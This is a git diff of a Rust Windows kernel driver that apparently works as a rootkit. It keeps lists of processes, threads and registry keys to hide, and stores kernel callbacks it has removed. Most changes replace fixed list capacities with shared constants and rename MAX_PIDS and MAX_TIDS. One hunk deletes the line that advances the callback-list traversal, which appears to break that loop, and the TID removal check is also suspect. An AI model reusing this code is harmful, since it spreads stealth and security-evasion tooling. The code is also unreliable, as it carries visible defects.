diff --git a/driver/src/callback/callbacks/object.rs b/driver/src/callback/callbacks/object.rs index 37b1ae3..da2c282 100644 --- a/driver/src/callback/callbacks/object.rs +++ b/driver/src/callback/callbacks/object.rs @@ -126,7 +126,6 @@ impl CallbackList for CallbackOb { } list_objects.push(((*next).enabled, addrs)); - next = (*next).callback_list.Flink as *mut OBCALLBACK_ENTRY; } diff --git a/driver/src/callback/mod.rs b/driver/src/callback/mod.rs index 5a3a56e..862a3ae 100644 --- a/driver/src/callback/mod.rs +++ b/driver/src/callback/mod.rs @@ -1,7 +1,10 @@ use { alloc::vec::Vec, crate::internals::structs::{CallbackRestaure, CallbackRestaureOb}, - shared::structs::{CallbackInfoInput, CallbackInfoOutput}, + shared::{ + vars::MAX_CALLBACK, + structs::{CallbackInfoInput, CallbackInfoOutput}, + }, spin::{lazy::Lazy, Mutex}, wdk_sys::NTSTATUS, }; @@ -10,13 +13,13 @@ pub mod ioctls; pub mod callbacks; /// Variable that stores callbacks that have been removed. -pub static mut INFO_CALLBACK_RESTAURE: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(40))); +pub static mut INFO_CALLBACK_RESTAURE: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_CALLBACK))); /// Variable that stores callbacks registry that have been removed. -static mut INFO_CALLBACK_RESTAURE_REGISTRY: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(40))); +static mut INFO_CALLBACK_RESTAURE_REGISTRY: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_CALLBACK))); /// Variable that stores callbacks Ob that have been removed. -static mut INFO_CALLBACK_RESTAURE_OB: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(40))); +static mut INFO_CALLBACK_RESTAURE_OB: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_CALLBACK))); /// Trait defining common operations for callback lists. pub trait CallbackList { diff --git a/driver/src/process/callback.rs b/driver/src/process/callback.rs index bca10b8..3d48b5c 100644 --- a/driver/src/process/callback.rs +++ b/driver/src/process/callback.rs @@ -4,7 +4,7 @@ use { alloc::vec::Vec, core::ffi::c_void, spin::{Mutex, lazy::Lazy}, - shared::{structs::{ProcessListInfo, ProcessProtection}, vars::MAX_PIDS}, + shared::{structs::{ProcessListInfo, ProcessProtection}, vars::MAX_PID}, winapi::um::winnt::{ PROCESS_CREATE_THREAD, PROCESS_TERMINATE, PROCESS_VM_OPERATION, PROCESS_VM_READ @@ -22,7 +22,7 @@ use { pub static mut CALLBACK_REGISTRATION_HANDLE_PROCESS: *mut c_void = core::ptr::null_mut(); /// List of target PIDs protected by a mutex. -static TARGET_PIDS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_PIDS))); +static TARGET_PIDS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_PID))); /// Method to check if the action sent is to add or remove a pid from the list of protected processes /// @@ -56,7 +56,7 @@ pub fn add_remove_process_toggle(process: *mut ProcessProtection) -> NTSTATUS { fn add_target_pid(pid: usize) -> NTSTATUS { let mut pids = TARGET_PIDS.lock(); - if pids.len() >= MAX_PIDS { + if pids.len() >= MAX_PID { log::error!("PID list is full"); return STATUS_UNSUCCESSFUL; } diff --git a/driver/src/process/mod.rs b/driver/src/process/mod.rs index 6a87b9c..d502991 100644 --- a/driver/src/process/mod.rs +++ b/driver/src/process/mod.rs @@ -4,7 +4,7 @@ use { alloc::{boxed::Box, vec::Vec}, core::sync::atomic::{AtomicPtr, Ordering}, shared::{ - vars::MAX_PIDS, + vars::MAX_PID, enums::Options, structs::{ HiddenProcessInfo , ProcessListInfo, TargetProcess, @@ -31,7 +31,7 @@ pub use callback::*; pub mod ioctls; /// List of target processes protected by a mutex. -pub static PROCESS_INFO_HIDE: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_PIDS))); +pub static PROCESS_INFO_HIDE: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_PID))); /// Represents a process in the operating system. pub struct Process { diff --git a/driver/src/registry/mod.rs b/driver/src/registry/mod.rs index 55bce0e..d897be9 100644 --- a/driver/src/registry/mod.rs +++ b/driver/src/registry/mod.rs @@ -3,7 +3,7 @@ extern crate alloc; use { alloc::{string::{String, ToString}, vec::Vec}, core::marker::PhantomData, - shared::structs::TargetRegistry, + shared::{structs::TargetRegistry, vars::MAX_REGISTRY}, spin::{lazy::Lazy, Mutex, MutexGuard}, utils::KeyListType, wdk_sys::{NTSTATUS, STATUS_DUPLICATE_OBJECTID, STATUS_SUCCESS, STATUS_UNSUCCESSFUL} @@ -17,16 +17,16 @@ pub mod ioctls; pub use callback::*; /// List of keys and target values. -pub static TARGET_KEY_VALUES: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(20))); +pub static TARGET_KEY_VALUES: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_REGISTRY))); /// List of target keys. -static TARGET_KEYS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(20))); +static TARGET_KEYS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_REGISTRY))); /// List of hide keys. -static HIDE_KEYS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(20))); +static HIDE_KEYS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_REGISTRY))); /// List of keys and target values. -static HIDE_KEY_VALUES: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(20))); +static HIDE_KEY_VALUES: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_REGISTRY))); /// Trait defining common operations for registry lists. trait RegistryList { diff --git a/driver/src/thread/callback.rs b/driver/src/thread/callback.rs index 2fc8200..afe7012 100644 --- a/driver/src/thread/callback.rs +++ b/driver/src/thread/callback.rs @@ -3,7 +3,7 @@ use { alloc::vec::Vec, core::ffi::c_void, - shared::{structs::{ThreadListInfo, ThreadProtection}, vars::MAX_TIDS}, + shared::{structs::{ThreadListInfo, ThreadProtection}, vars::MAX_TID}, spin::{lazy::Lazy, Mutex}, wdk_sys::{ ntddk::PsGetThreadId, NTSTATUS, OB_PRE_OPERATION_INFORMATION, PETHREAD, @@ -17,7 +17,7 @@ use { pub static mut CALLBACK_REGISTRATION_HANDLE_THREAD: PVOID = core::ptr::null_mut(); /// List of the target TIDs -static TARGET_TIDS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_TIDS))); +static TARGET_TIDS: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_TID))); /// Method to check if the action sent is to add or remove a tid from the list of protected threads /// @@ -46,7 +46,7 @@ pub fn add_remove_thread_toggle(process: *mut ThreadProtection) -> NTSTATUS { fn add_target_tid(tid: usize) -> NTSTATUS { let mut tids = TARGET_TIDS.lock(); - if tids.len() >= MAX_TIDS { + if tids.len() >= MAX_TID { log::error!("tid list is full"); return STATUS_UNSUCCESSFUL; } @@ -72,7 +72,7 @@ fn add_target_tid(tid: usize) -> NTSTATUS { fn remove_target_tid(tid: usize) -> NTSTATUS { let mut tids = TARGET_TIDS.lock(); - if tids.len() >= MAX_TIDS { + if tids.len() >= MAX_TID { log::error!("tid list is full"); return STATUS_UNSUCCESSFUL; } diff --git a/driver/src/thread/mod.rs b/driver/src/thread/mod.rs index 35be14b..a6b2a04 100644 --- a/driver/src/thread/mod.rs +++ b/driver/src/thread/mod.rs @@ -9,7 +9,7 @@ use { HiddenThreadInfo, TargetThread, LIST_ENTRY, ThreadListInfo, EnumerateInfoInput }, - vars::MAX_TIDS, + vars::MAX_TID, enums::Options, }, wdk_sys::{ @@ -26,7 +26,7 @@ pub mod ioctls; pub use callback::*; /// List of target threads protected by a mutex. -pub static THREAD_INFO_HIDE: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_TIDS))); +pub static THREAD_INFO_HIDE: Lazy>> = Lazy::new(|| Mutex::new(Vec::with_capacity(MAX_TID))); /// Represents a thread in the operating system. pub struct Thread { diff --git a/driver/src/utils/macros.rs b/driver/src/utils/macros.rs index 23569a0..5213ebb 100644 --- a/driver/src/utils/macros.rs +++ b/driver/src/utils/macros.rs @@ -21,8 +21,8 @@ macro_rules! handle { $action(input_buffer, output_buffer, $information) }}; - ($irp:expr, $action:expr, $type_:ty) => {{ - let input_buffer = match crate::utils::get_input_buffer::<$type_>($irp) { + ($stack:expr, $action:expr, $type_:ty) => {{ + let input_buffer = match crate::utils::get_input_buffer::<$type_>($stack) { Ok(buffer) => buffer, Err(status) => return status, };